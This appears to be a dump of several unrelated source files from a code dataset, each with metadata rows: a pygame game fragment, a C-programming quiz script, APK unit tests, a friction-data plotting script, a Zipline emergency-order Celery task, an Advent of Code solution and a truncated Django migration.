screen.blit(self.image, (self.rect.x, self.rect.y))
maryo = Player(100, 830)
maryo_group.add(maryo)
TILES_DATA = [
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
]
def draw():
row_counter = 0
for row in TILES_DATA:
col_counter = 0
for col in row:
if col == 1:
tile_img = pygame.image.load('img/tile.png')
tile_img = pygame.transform.scale(tile_img, (100, 100))
screen.blit(tile_img, (row_counter * tile_size, col_counter * tile_size))
col_counter += 1
row_counter += 1
run = True
while run:
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
screen.blit(background, (0, 0))
draw()
maryo_group.update()
pygame.display.update()
| UTF-8 | Python | false | false | 2,376 | py | 7 | platform.py | 7 | 0.530724 | 0.46633 | 0 | 83 | 27.626506 | 89 |
Mehedi-Bin-Hafiz/Status-check-of-student-by-Machine-Learning | 12,000,138,665,267 | a9d7f92ea351d68443487cdffa022c62eb4935c3 | ac3b4b27c026621283a7b087a795b86ff1e6902c | /ResearchGenerator/FinalStatusQuestion.py | 0af7fd895f0ba7582d2a1f4dabb947a780c9c888 | []
| no_license | https://github.com/Mehedi-Bin-Hafiz/Status-check-of-student-by-Machine-Learning | 7d29469152ef1ead3682bb050972b8baba24040c | 8949fe36ff9484417ab86115c432b3f87fe745e8 | refs/heads/master | 2023-08-18T01:57:10.771713 | 2021-09-26T01:53:38 | 2021-09-26T01:53:38 | 239,188,240 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # for i in range(1,11): #for create file
# f1=open('..\statusmean\FinalQuestions\{0}.txt'.format(i),'w')
# f1.close()
class FinalStatus():
def __init__(self, value):
self.ID = value
def Status(self):
problemlist=[]
TopicName=0
q1=0
q2=0
q3=0
q4=0
q5=0
q6=0
q7=0
q8=0
q9=0
q10=0
position=0
print("Topic:Input output.")
f1=open('..\statusmean\FinalQuestions\q1.txt','r',encoding="utf8")
print(f1.read())
f1.close()
ans1=input("Enter your ans:")
if(ans1=="\\"):
print('Right, You have got 1 marks')
q1=1
else:
TopicName=1
print('Wrong, Correct Answer is: \\ \n')
print("\nTopic: Simple calculation \n")
print("Question 2: ")
f2 = open('..\statusmean\FinalQuestions\q2.txt', 'r', encoding="utf8")
print(f2.read())
f2.close()
ans1 = input("Enter your ans:")
if (ans1 == '207'):
print('Right, You have got 2 marks')
q2 = 2
else:
print('Wrong, Correct Answer is: 207\n')
problemlist.append("simple calculation")
print("\nTopic: String: \n")
print('Question 3: ')
f3 = open('..\statusmean\FinalQuestions\q3.txt', 'r', encoding="utf8")
print(f3.read())
f3.close()
print('A. printf("%ld",V )')
print('B. printf("%c",V)')
print('C. printf("%s",V)')
print('D. printf("%f",V)')
ans1 = input("Enter your ans:")
ans1 = ans1.lower()
if (ans1 == 'c'):
print('Right, You have got 3 marks')
q3 = 3
else:
problemlist.append('String')
print('Wrong, Correct Answer is: Option C\n')
print("\nTopic: Input Output\n")
print("Question 4: ")
f4 = open('..\statusmean\FinalQuestions\q4.txt', 'r', encoding="utf8")
print(f4.read())
f4.close()
print('A. printf("\\n");')
print('B. echo "\\\\n";')
print("C. printf('\\n');")
print('D. printf("\\\\n");')
ans1 = input("Enter your ans:")
ans1 = ans1.lower()
if (ans1 == 'd'):
print('Right, You have got 4 marks')
q4 = 4
else:
TopicName=1
print('Wrong, Correct Answer is: Option D\n')
if (TopicName==1):
problemlist.append("Input output")
print( "\nTopic: Expression\n")
print("Question 5: ")
f5 = open('..\statusmean\FinalQuestions\q5.txt', 'r', encoding="utf8")
print(f5.read())
f5.close()
print("A. 2*xx+3*xy")
print("B. 2x^2+3*x*y")
print("C. 2*x*x+3*x*y")
print("D. 2*x*2+3*x*y")
ans1=input("Enter your ans:")
ans1=ans1.lower()
if(ans1=='c'):
print('Right, You have got 5 marks')
q5=5
else:
problemlist.append("Expression")
print('Wrong, Correct Answer is: Option C\n')
print("Question 6:\n")
f6 = open('..\statusmean\FinalQuestions\q6.txt', 'r', encoding="utf8")
print(f6.read())
f6.close()
ans1=input("Enter your ans:")
ans1=ans1.lower()
if(ans1=='0'):
print('Right, You have got 6 marks')
q6=6
else:
TopicName=2
print('Wrong Correct Answer is: 0\n')
print( "\nTopic: Conditional statement\n")
print('Question 7: ')
f7 = open('..\statusmean\FinalQuestions\q7.txt', 'r', encoding="utf8")
print(f7.read())
f7.close()
ans1=input("Enter your ans:")
ans1=ans1.lower()
if(ans1=='output is: '):
print('Right, You have got 7 marks')
q7=7
else:
print('Wrong Correct Answer is: output is: \n')
if (TopicName == 2):
problemlist.append("Conditional statement")
print( "\nTopic: Control Instructions\n")
print("Question 8: ")
f8 = open('..\statusmean\FinalQuestions\q8.txt', 'r', encoding="utf8")
print(f8.read())
f1.close()
ans1=input("Enter your ans:")
ans1=ans1.lower()
if(ans1=='output is: 21'):
print('Right, You have got 8 Marks')
q8=8
else:
problemlist.append("Arithmetic operation")
print('Wrong Correct Answer is: Output is: 21 \n')
print( "\nTopic: loop\n")
print("Question 9: " )
f9 = open('..\statusmean\FinalQuestions\q9.txt', 'r', encoding="utf8")
print(f9.read())
f9.close()
print('A. 1, 11\n 1, 12\n 2, 13')
print('B. 0, 11\n 1, 12\n 2, 13')
print("C. 0, 10\n 1, 11\n 2, 13")
print('D. 1, 11\n 1, 12\n 2, 13')
ans1=input("Enter your ans:")
ans1=ans1.lower()
if(ans1=='b'):
print('Right, You have got 9 marks')
q9=9
else:
problemlist.append("loop")
print('Wrong, Correct Answer is: Option B\n')
print("\nTopic: Problem solving\n")
print(" Question 10: ")
f10 = open('..\statusmean\FinalQuestions\q10.txt', 'r', encoding="utf8")
print(f10.read())
f10.close()
print("A. (25/100)*320")
print("B. (100/25)*320")
print("C. (100/325)*25")
print("D. 25/(100*320)")
ans1 = input("Enter your ans:")
ans1 = ans1.lower()
if (ans1 == 'a'):
print('Right, You have got 10 point')
q10 = 10
else:
problemlist.append("Problem solving")
print('Wrong, Correct Answer is: Option A\n')
status = FinalStatus(111)
status.Status() | UTF-8 | Python | false | false | 5,867 | py | 33 | FinalStatusQuestion.py | 17 | 0.486791 | 0.442475 | 0 | 196 | 28.938776 | 80 |
olenasmokvyna/mason-cli | 970,662,652,957 | 4b8dc4e0608af5f2d711ee362e4ef6566a85e91a | e38b7d9088344e4c7a2185a125ea03543f91fd82 | /tests/internal/models/test_apk.py | 6d46ca61959c0f4f65af86db98d6133717e10c32 | [
"Apache-2.0"
]
| permissive | https://github.com/olenasmokvyna/mason-cli | ca5fbe963bb49272dae7c8ac0fd2f5c374081a24 | ac9ac5041b12090b94958ec41d2b5a294c4b61e6 | refs/heads/master | 2023-07-19T11:26:45.748448 | 2021-09-09T17:31:01 | 2021-09-09T17:31:05 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
import unittest
import click
from mock import MagicMock
from cli.internal.models.apk import Apk
from tests import __tests_root__
class ApkTest(unittest.TestCase):
def setUp(self):
config = MagicMock()
test_package_name = 'com.this.is.a.test'
test_package_version = '11'
test_package_version_code = 16
apkf = MagicMock()
apkf.package = MagicMock(return_value=test_package_name)
apkf.get_androidversion_name = MagicMock(return_value=test_package_version)
apkf.get_androidversion_code = MagicMock(return_value=test_package_version_code)
apkf.is_valid_APK = MagicMock(return_value=True)
apkf.get_min_sdk_version = MagicMock(return_value=23)
self.test_apk = Apk(config, MagicMock(), apkf)
def test_apk_is_valid(self):
self.assertIsNone(self.test_apk.validate())
def test_apk_content_type(self):
self.assertEqual(
self.test_apk.get_content_type(), 'application/vnd.android.package-archive')
def test_apk_type(self):
self.assertEqual(self.test_apk.get_type(), 'apk')
def test_apk_pretty_type(self):
self.assertEqual(self.test_apk.get_pretty_type(), 'App')
def test_apk_sub_type(self):
self.assertIsNone(self.test_apk.get_sub_type())
def test_apk_name(self):
self.assertEqual(self.test_apk.get_name(), self.test_apk.apk.get_package())
def test_apk_version(self):
self.assertEqual(self.test_apk.get_version(), self.test_apk.apk.get_androidversion_code())
def test_apk_meta_data(self):
meta_data = {
'apk': {
'versionName': self.test_apk.apk.get_androidversion_name(),
'versionCode': self.test_apk.apk.get_androidversion_code(),
'packageName': self.test_apk.apk.get_package()
},
}
self.assertEqual(self.test_apk.get_registry_meta_data(), meta_data)
def test_apk_v1_signed(self):
mock_config = MagicMock()
apk = Apk.parse(mock_config, os.path.join(__tests_root__, 'res', 'v1.apk'))
self.assertIsNotNone(apk)
def test_apk_v2_signed(self):
mock_config = MagicMock()
apk = Apk.parse(mock_config, os.path.join(__tests_root__, 'res', 'v2.apk'))
self.assertIsNotNone(apk)
def test_apk_v1_and_v2_signed(self):
mock_config = MagicMock()
apk = Apk.parse(mock_config, os.path.join(__tests_root__, 'res', 'v1and2.apk'))
self.assertIsNotNone(apk)
def test_apk_unsigned(self):
mock_config = MagicMock()
with self.assertRaises(click.Abort):
Apk.parse(mock_config, os.path.join(__tests_root__, 'res', 'unsigned.apk'))
def test_apk_debug_signed(self):
mock_config = MagicMock()
with self.assertRaises(click.Abort):
Apk.parse(mock_config, os.path.join(__tests_root__, 'res', 'debug.apk'))
| UTF-8 | Python | false | false | 2,933 | py | 61 | test_apk.py | 49 | 0.628367 | 0.623594 | 0 | 89 | 31.955056 | 98 |
mayziyuhuang/COF_Amgen | 481,036,346,619 | 82897e855d83865726387bbf6141e2a83c9e8445 | 74efc71fabcd9194c7f937dfd73e2bba13f2484f | /load_glass_glass.py | afe740104f38dcb4611a37b3a80a7e23bef1722c | []
| no_license | https://github.com/mayziyuhuang/COF_Amgen | 506570aa56c5d9cf928f28a972fbbe814ea9adcd | 5ee121ceb3e0de009c5f17de3da07e5ce627d3a4 | refs/heads/master | 2021-04-27T09:58:51.410200 | 2018-02-23T01:44:00 | 2018-02-23T01:44:00 | 122,527,501 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import scipy.special
import matplotlib
matplotlib.use
import matplotlib.pyplot as plt
plt.style.use('seaborn-talk')
import pandas as pd
import friction_functions as data
load_gram_1 = 657.8
load_gram_2 = 657.4
load_gram_3 = 204.2
load_gram_4 = 657.2
#1.1um PAC on glass vs glass, load = 657.8
glass1um1 = 'data/20171003_PAC1.1umglass_1_vs_glass_657.8g_load_1.xlsx'
glass1um1df = data.friction_data(glass1um1, load_gram_1)
glass1um2 = 'data/20171003_PAC1.1umglass_2_vs_glass_657.8g_load_1.xlsx'
glass1um2df = data.friction_data(glass1um2, load_gram_1)
glass1um3 = 'data/20171003_PAC1.1umglass_3_vs_glass_657.8g_load_1.xlsx'
glass1um3df = data.friction_data(glass1um3, load_gram_1)
glass1um4 = 'data/20171003_PAC1.1umglass_4_vs_glass_657.8g_load_1.xlsx'
glass1um4df = data.friction_data(glass1um4, load_gram_1)
glass1um5 = 'data/20171003_PAC1.1umglass_5_vs_glass_657.8g_load_1.xlsx'
glass1um5df = data.friction_data(glass1um5, load_gram_1)
#3.3um PAC on glass vs glass, load = 657.8
glass3um1 = 'data/20171003_PAC3.3umglass_1_vs_glass_657.8g_load_1.xlsx'
glass3um1df = data.friction_data(glass3um1, load_gram_1)
glass3um2 = 'data/20171003_PAC3.3umglass_2_vs_glass_657.8g_load_1.xlsx'
glass3um2df = data.friction_data(glass3um2, load_gram_1)
glass3um3 = 'data/20171003_PAC3.3umglass_3_vs_glass_657.8g_load_1.xlsx'
glass3um3df = data.friction_data(glass3um3, load_gram_1)
glass3um4 = 'data/20171003_PAC3.3umglass_4_vs_glass_657.8g_load_1.xlsx'
glass3um4df = data.friction_data(glass3um4, load_gram_1)
glass3um5 = 'data/20171003_PAC3.3umglass_5_vs_glass_657.8g_load_1.xlsx'
glass3um5df = data.friction_data(glass3um5, load_gram_1)
#0.1 um PAC on glass vs glass, load = 657.4
glass0_1um1 = 'data/20171006_PAC0.1umglass_1_vs_glass_657.4g_load_1.xlsx'
glass0_1um1df = data.friction_data(glass0_1um1, load_gram_2)
glass0_1um2 = 'data/20171006_PAC0.1umglass_2_vs_glass_657.4g_load_1.xlsx'
glass0_1um2df = data.friction_data(glass0_1um2, load_gram_2)
glass0_1um3 = 'data/20171006_PAC0.1umglass_3_vs_glass_657.4g_load_1.xlsx'
glass0_1um3df = data.friction_data(glass0_1um3, load_gram_2)
glass0_1um4 = 'data/20171006_PAC0.1umglass_4_vs_glass_657.4g_load_1.xlsx'
glass0_1um4df = data.friction_data(glass0_1um4, load_gram_2)
glass0_1um5 = 'data/20171006_PAC0.1umglass_5_vs_glass_657.4g_load_1.xlsx'
glass0_1um5df = data.friction_data(glass0_1um5, load_gram_2)
#5.6 um PAHT on glass vs glass, load = 657.4
glass5_6umHT1 = 'data/20171006_HT5.6um_glass_1_vs_glass_657.4g_load_1.xlsx'
glass5_6umHT1df = data.friction_data(glass5_6umHT1, load_gram_2)
glass5_6umHT2 = 'data/20171006_HT5.6um_glass_2_vs_glass_657.4g_load_1.xlsx'
glass5_6umHT2df = data.friction_data(glass5_6umHT2, load_gram_2)
glass5_6umHT3 = 'data/20171006_HT5.6um_glass_3_vs_glass_657.4g_load_1.xlsx'
glass5_6umHT3df = data.friction_data(glass5_6umHT3, load_gram_2)
glass5_6umHT4 = 'data/20171006_HT5.6um_glass_4_vs_glass_657.4g_load_1.xlsx'
glass5_6umHT4df = data.friction_data(glass5_6umHT4, load_gram_2)
glass5_6umHT5 = 'data/20171006_HT5.6um_glass_5_vs_glass_657.4g_load_1.xlsx'
glass5_6umHT5df = data.friction_data(glass5_6umHT5, load_gram_2)
#bare glass (0um) vs glass, load = 657.4
glass0um1 = 'data/20171006_bare_glass_1_vs_glass_657.4g_load_1.xlsx'
glass0um1df = data.friction_data(glass0um1, load_gram_2)
glass0um2 = 'data/20171006_bare_glass_2_vs_glass_657.4g_load_1.xlsx'
glass0um2df = data.friction_data(glass0um2, load_gram_2)
glass0um3 = 'data/20171006_bare_glass_3_vs_glass_657.4g_load_1.xlsx'
glass0um3df = data.friction_data(glass0um3, load_gram_2)
glass0um4 = 'data/20171006_bare_glass_4_vs_glass_657.4g_load_1.xlsx'
glass0um4df = data.friction_data(glass0um4, load_gram_2)
glass0um5 = 'data/20171006_bare_glass_5_vs_glass_657.4g_load_1.xlsx'
glass0um5df = data.friction_data(glass0um5, load_gram_2)
#5.9 um PAC on glass vs glass, load = 657.2
glass5_9um1 = 'data/20171009_PAC_5.9umglass_1_vs_glass_657.2g_load_1.xlsx'
glass5_9um1df = data.friction_data(glass5_9um1, load_gram_4)
glass5_9um2 = 'data/20171009_PAC_5.9umglass_2_vs_glass_657.2g_load_1.xlsx'
glass5_9um2df = data.friction_data(glass5_9um2, load_gram_4)
glass5_9um3 = 'data/20171009_PAC_5.9umglass_3_vs_glass_657.2g_load_1.xlsx'
glass5_9um3df = data.friction_data(glass5_9um3, load_gram_4)
glass5_9um4 = 'data/20171009_PAC_5.9umglass_4_vs_glass_657.2g_load_1.xlsx'
glass5_9um4df = data.friction_data(glass5_9um4, load_gram_4)
glass5_9um5 = 'data/20171009_PAC_5.9umglass_5_vs_glass_657.2g_load_1.xlsx'
glass5_9um5df = data.friction_data(glass5_9um5, load_gram_4)
#
# plt.plot(glass0um1df['travel'], glass0um1df['load'], marker='.', linestyle='-', label = 'glass (0 um PA-C) vs glass', color = '#1f77b4ff')
# plt.plot(glass0um2df['travel'], glass0um2df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#1f77b4ff')
# plt.plot(glass0um3df['travel'], glass0um3df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#1f77b4ff')
# plt.plot(glass0um4df['travel'], glass0um4df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#1f77b4ff')
# plt.plot(glass0um5df['travel'], glass0um5df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#1f77b4ff')
# plt.plot(glass0_1um1df['travel'], glass0_1um1df['load'], marker='.', linestyle='-', label = '0.1 um PA-C on glass vs glass', color = '#ff7f0eff')
# plt.plot(glass0_1um2df['travel'], glass0_1um2df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#ff7f0eff')
# plt.plot(glass0_1um3df['travel'], glass0_1um3df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#ff7f0eff')
# plt.plot(glass0_1um4df['travel'], glass0_1um4df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#ff7f0eff')
# plt.plot(glass0_1um5df['travel'], glass0_1um5df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#ff7f0eff')
#
# plt.plot(glass1um1df['travel'], glass1um1df['load'], marker='.', linestyle='-', label = '1.1 um PA-C on glass vs glass', color = '#2ca02cff')
# plt.plot(glass1um2df['travel'], glass1um2df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#2ca02cff')
# plt.plot(glass1um3df['travel'], glass1um3df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#2ca02cff')
# plt.plot(glass1um4df['travel'], glass1um4df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#2ca02cff')
# plt.plot(glass1um5df['travel'], glass1um5df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#2ca02cff')
#
# plt.plot(glass3um1df['travel'], glass3um1df['load'], marker='.', linestyle='-', label = '3.3 um PA-C on glass vs glass', color = '#d62728ff')
# plt.plot(glass3um2df['travel'], glass3um2df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#d62728ff')
# plt.plot(glass3um3df['travel'], glass3um3df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#d62728ff')
# plt.plot(glass3um4df['travel'], glass3um4df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#d62728ff')
# plt.plot(glass3um5df['travel'], glass3um5df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#d62728ff')
# #
# plt.plot(glass5_9um1df['travel'], glass5_9um1df['load'], marker='.', linestyle='-', label = '5.9 um PA-C on glass vs glass', color = '#9467bdff')
# plt.plot(glass5_9um2df['travel'], glass5_9um2df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#9467bdff')
# plt.plot(glass5_9um3df['travel'], glass5_9um3df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#9467bdff')
# plt.plot(glass5_9um4df['travel'], glass5_9um4df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#9467bdff')
# plt.plot(glass5_9um5df['travel'], glass5_9um5df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#9467bdff')
plt.plot(glass5_6umHT1df['travel'], glass5_6umHT1df['load'], marker='.', linestyle='-', label = '5.6 um PA-HT on glass vs glass', color = '#8c564bff')
plt.plot(glass5_6umHT2df['travel'], glass5_6umHT2df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#8c564bff')
plt.plot(glass5_6umHT3df['travel'], glass5_6umHT3df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#8c564bff')
plt.plot(glass5_6umHT4df['travel'], glass5_6umHT4df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#8c564bff')
plt.plot(glass5_6umHT5df['travel'], glass5_6umHT5df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#8c564bff')
plt.ylim(-0.1, 1.5)
plt.xlim(-2, 110)
plt.margins(0.2)
plt.xlabel('Travel Distance (mm)', fontsize=20)#
plt.ylabel('Frictional Force (N)', fontsize=20)
plt.legend(loc = 'upper right' ,prop={'size':10})
plt.tick_params(axis='both', which='major', labelsize=16)#
#plt.title('load vs distance', fontsize=24)#
plt.show()
| UTF-8 | Python | false | false | 8,785 | py | 11 | load_glass_glass.py | 10 | 0.703358 | 0.581446 | 0 | 138 | 62.65942 | 150 |
mchoccac/commcare-hq | 850,403,570,438 | 065030fefa3001e4d7dcd16ffe5e446adf579f36 | 04658b3e2a605a123c3c70727b2a94facc0714b3 | /custom/zipline/tasks.py | 652502972c11559bbd99a6f9c6be1fcd0efcbaff | []
| permissive | https://github.com/mchoccac/commcare-hq | ca35d00068eefdf4415e26886a8ad880cb8d78d0 | 88d5f5845f06f70f378f5d6090580c2e15b27460 | refs/heads/master | 2021-01-20T09:00:57.269410 | 2017-05-03T22:05:41 | 2017-05-03T22:05:41 | 90,211,626 | 0 | 0 | BSD-3-Clause | true | 2021-11-19T10:36:34 | 2017-05-04T02:11:02 | 2021-11-16T18:11:31 | 2021-11-19T10:36:30 | 615,456 | 0 | 0 | 12 | Python | false | false | import json
import requests
from celery.task import task
from custom.zipline.api import get_order_update_critical_section_key
from custom.zipline.models import EmergencyOrder, EmergencyOrderStatusUpdate
from django.conf import settings
from dimagi.utils.couch import CriticalSection
from dimagi.utils.logging import notify_exception
from dimagi.utils.parsing import json_format_datetime
from requests.auth import HTTPBasicAuth
ZIPLINE_STATUS_RECEIVED = 'received'
ZIPLINE_STATUS_REJECTED = 'rejected'
ZIPLINE_STATUS_ERROR = 'error'
# The timeout (in seconds) to use when making requests to Zipline
REQUEST_TIMEOUT = 120
# See send_emergency_order_request()
RETRY_INTERVAL = 5
MAX_ATTEMPTS = 3
@task(ignore_result=True)
def send_emergency_order_request(order_id, attempt=1):
try:
with CriticalSection(
[get_order_update_critical_section_key(order_id)],
timeout=(REQUEST_TIMEOUT + 10)
):
order = EmergencyOrder.objects.get(pk=order_id)
order.status = _send_emergency_order_request(order, attempt)
order.save()
except Exception as e:
notify_exception(
None,
message='[ZIPLINE] Error while sending order',
details={
'order_id': order_id,
'attempt': attempt,
}
)
create_error_record(order, 'Internal error: {}'.format(str(e)))
handle_emergency_order_request_retry(order, attempt)
def _send_emergency_order_request(order, attempt):
"""
Sends the emergency order request to Zipline.
:param order: the EmergencyOrder that should be sent
:param attempt: the current attempt number; in the event of errors, a total of MAX_ATTEMPTS will
be made, separated by a wait time of RETRY_INTERVAL minutes
:return: the new status to be set on the order
"""
order.zipline_request_attempts += 1
json_payload = get_json_payload_from_order(order)
json_payload = json.dumps(json_payload)
response = requests.post(
settings.ZIPLINE_API_URL,
auth=HTTPBasicAuth(settings.ZIPLINE_API_USER, settings.ZIPLINE_API_PASSWORD),
data=json_payload,
headers={'Content-Type': 'application/json'},
timeout=REQUEST_TIMEOUT
)
if response.status_code != 200:
handle_emergency_order_request_retry(order, attempt)
create_error_record(order, 'Received HTTP Response {} from Zipline'.format(response.status_code))
return EmergencyOrderStatusUpdate.STATUS_ERROR
response_text = response.text
try:
response_json = json.loads(response_text)
except (TypeError, ValueError):
notify_exception(
None,
message='[ZIPLINE] Invalid JSON response received',
details={
'order_id': order.pk,
'attempt': attempt,
}
)
create_error_record(order, 'Could not parse JSON response from Zipline: {}'.format(response_text))
handle_emergency_order_request_retry(order, attempt)
return EmergencyOrderStatusUpdate.STATUS_ERROR
status = response_json.get('status')
if status == ZIPLINE_STATUS_RECEIVED:
handle_request_received(order)
return EmergencyOrderStatusUpdate.STATUS_RECEIVED
elif status == ZIPLINE_STATUS_REJECTED:
reason = response_json.get('reason')
handle_request_rejected(order, reason)
return EmergencyOrderStatusUpdate.STATUS_REJECTED
elif status == ZIPLINE_STATUS_ERROR:
description = response_json.get('description')
create_error_record(order, 'Error received from Zipline: {}'.format(description))
return EmergencyOrderStatusUpdate.STATUS_ERROR
else:
create_error_record(order, 'Unrecognized status received from Zipline: {}'.format(status))
handle_emergency_order_request_retry(order, attempt)
return EmergencyOrderStatusUpdate.STATUS_ERROR
def get_json_payload_from_order(order):
"""
Takes an EmergencyOrder and returns a dictionary representing the JSON
payload that should be sent to represent it.
:param order: the EmergencyOrder object
:return: dict
"""
return {
'transactionType': 'emergencyOrder',
'timestamp': json_format_datetime(order.timestamp),
'orderId': order.pk,
'locationCode': order.location_code,
'products': [
{'productCode': code, 'quantityOrdered': info.get('quantity')}
for code, info in order.products_requested.iteritems()
],
}
def handle_request_received(order):
"""
Handles a received response from Zipline.
:param order: the EmergencyOrder for the request
"""
order.received_status = EmergencyOrderStatusUpdate.create_for_order(
order.pk,
EmergencyOrderStatusUpdate.STATUS_RECEIVED
)
def handle_request_rejected(order, reason):
"""
Handles a rejected response from Zipline.
:param order: the EmergencyOrder for the request
"""
order.rejected_status = EmergencyOrderStatusUpdate.create_for_order(
order.pk,
EmergencyOrderStatusUpdate.STATUS_REJECTED,
additional_text=reason
)
def create_error_record(order, error_message):
EmergencyOrderStatusUpdate.create_for_order(
order.pk,
EmergencyOrderStatusUpdate.STATUS_ERROR,
additional_text=error_message
)
def handle_emergency_order_request_retry(order, current_attempt):
"""
Handles retrying an emergency order.
:param order: the EmergencyOrder to retry
:param current_attempt: the current attempt number
"""
if current_attempt < MAX_ATTEMPTS:
send_emergency_order_request.apply_async(
args=[order.pk],
kwargs={'attempt': (current_attempt + 1)},
countdown=(60 * RETRY_INTERVAL)
)
| UTF-8 | Python | false | false | 5,880 | py | 2,110 | tasks.py | 1,408 | 0.672789 | 0.670238 | 0 | 169 | 33.792899 | 106 |
kevin-chau/cs61a | 12,773,232,747,390 | 6c5b0ad7f1efefefa6ef44a8d070f5d15d837cfc | 955252646b7c5d5b0f8e03eab0026eec02d09355 | /Midterm2/prime_generator.py | b53bbcad7dd197d6079638bfc4b40442ee47b63b | []
| no_license | https://github.com/kevin-chau/cs61a | 53ae0a11b37116d33a99a9d3abb19ad145db7bf6 | 0f2c841a0eef56845254948a85fa55aa7469bf38 | refs/heads/master | 2021-05-31T08:28:07.764846 | 2016-03-16T07:26:29 | 2016-03-16T07:26:29 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def make_prime_generator():
prime = 1
def prime_generator():
nonlocal prime
prime += 1
def is_prime(n):
for i in range(2,n):
if n % i == 0:
return False
return True
if prime == 2:
return 2
while not is_prime(prime):
prime += 1
return prime
return prime_generator
| UTF-8 | Python | false | false | 300 | py | 65 | prime_generator.py | 60 | 0.616667 | 0.593333 | 0 | 16 | 17.6875 | 28 |
cktang88/aoc2020 | 19,370,302,527,687 | 655630fb721b5461d7a5489cc288b98b986e36e1 | e7ad8f66053860cfe35fe5c2414d5aef4e75be4a | /17.py | 643df7e84edf189a6f3460184511f24ae8fab243 | []
| no_license | https://github.com/cktang88/aoc2020 | 896ebc43e7bccbd8c9b68b39e291e1afe9b5a689 | 58c380e29285803bef4e1c5aad8dfa9774ac6990 | refs/heads/main | 2023-02-01T12:06:35.630569 | 2020-12-18T00:27:58 | 2020-12-18T00:27:58 | 317,740,058 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import re
import pprint
from copy import deepcopy
inp = open('17a.txt','r')
arr = [a.strip() for a in inp]
md = 7 # shift
w = len(arr[0]) + md*2
h = len(arr) + md*2
l = 1 + md*2
pprint.pprint(arr)
print(w,h)
def mprint(mat2d):
pprint.pprint([''.join(a) for a in mat2d])
mat = [[['.' for k in range(h)] for j in range(w)] for i in range(l)]
for i, row in enumerate(arr):
for j, c in enumerate(row):
if c == '#':
mat[md][md+i][md+j] = '#'
# for m in mat:
mprint(mat[md])
x1,x2 = md, len(arr[0]) + md
y1,y2 = md, len(arr) + md
def numNeighbor(_i,_j,_k):
ans = 0
for i in range(-1,1):
for j in range(-1,1):
for k in range(-1,1):
if i==j==k==0:
continue
if mat[_i+i][_j+j][_k+k] == '#':
ans += 1
return ans
for c in range(1,2):
newmat = deepcopy(mat)
for i in range(md-c,md+c+1):
for j in range(x1-c,x2+c+1):
for k in range(y1-c,y2+c+1):
n = numNeighbor(i,j,k)
isActive = mat[i][j][k] == '#'
print(i,j,k, n, isActive)
if n ==3 or n==2 and isActive:
newmat[i][j][k] = '#'
else:
newmat[i][j][k] = '.'
mat = deepcopy(newmat)
mprint(mat[md])
| UTF-8 | Python | false | false | 1,182 | py | 24 | 17.py | 21 | 0.51692 | 0.48731 | 0 | 53 | 21.301887 | 69 |
linxucc/tutu | 13,864,154,438,100 | dff8f2aeb3250b093727990a95479b65b351278a | 17768634cd100c294c57769fafaedfeafd5b6406 | /promotions/migrations/0005_auto_20180904_1920.py | 8f11a275f17578deafd79b03d0712c30cf186d89 | []
| no_license | https://github.com/linxucc/tutu | 52f9f37544723a55c81b377e906afdb904efe6fd | 9f79043a91390cabaf99cdc80cd914a12c9ca2f8 | refs/heads/master | 2020-03-22T04:00:31.473980 | 2018-09-27T05:31:12 | 2018-09-27T05:31:12 | 139,463,321 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 2.0.7 on 2018-09-04 11:20
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('trips', '0018_auto_20180904_1920'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('orders', '0010_auto_20180904_1920'),
('promotions', '0004_auto_20180830_0038'),
]
operations = [
migrations.CreateModel(
name='Coupon',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('payment_YN', models.BooleanField(default=False, verbose_name='是否已支付(暂时保留)')),
('create_date_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('last_modify_date_time', models.DateTimeField(auto_now=True, verbose_name='上次修改时间')),
],
),
migrations.CreateModel(
name='CouponTemplate',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100, verbose_name='优惠券名称')),
('description', models.CharField(max_length=100, verbose_name='优惠券描述')),
